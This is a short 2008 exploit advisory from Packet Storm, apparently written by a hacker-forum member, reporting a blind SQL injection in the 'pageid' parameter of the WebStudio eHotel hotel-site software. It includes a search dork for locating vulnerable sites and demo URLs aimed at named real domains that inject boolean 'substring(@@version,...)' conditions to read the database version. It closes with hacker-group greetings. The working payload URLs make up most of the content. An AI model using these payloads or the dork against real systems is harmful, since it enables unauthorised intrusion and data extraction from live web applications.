webstudioehotelpi-sql.txt

2008-11-26T00:00:00
ID PACKETSTORM:72307
Type packetstorm
Reporter Hussin X
Modified 2008-11-26T00:00:00

Description

                                        
                                            `WebStudio eHotel (pageid) Blind SQL Injection Vulnerability  
___________________________________  
  
Author: Hussin X  
  
Home : www.IQ-TY.com & www.TrYaG.cc  
  
___________________________________  
  
script : http://www.bdigital.biz/index.php?pageid=216  
  
DorK : "Powered by WebStudio eHotel"  
  
Demo :  
_______  
  
  
http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=3  
( TRUE )  
  
  
  
http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=4  
( FALSE )  
  
  
  
http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=5  
( FALSE )  
  
  
  
  
____________________________( Greetz )_________________________________  
|  
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |  
|  
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab  
|  
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|  
|_____________________________________________________________________  
  
  
Im IRAQi | Im TrYaGi  
  
  
`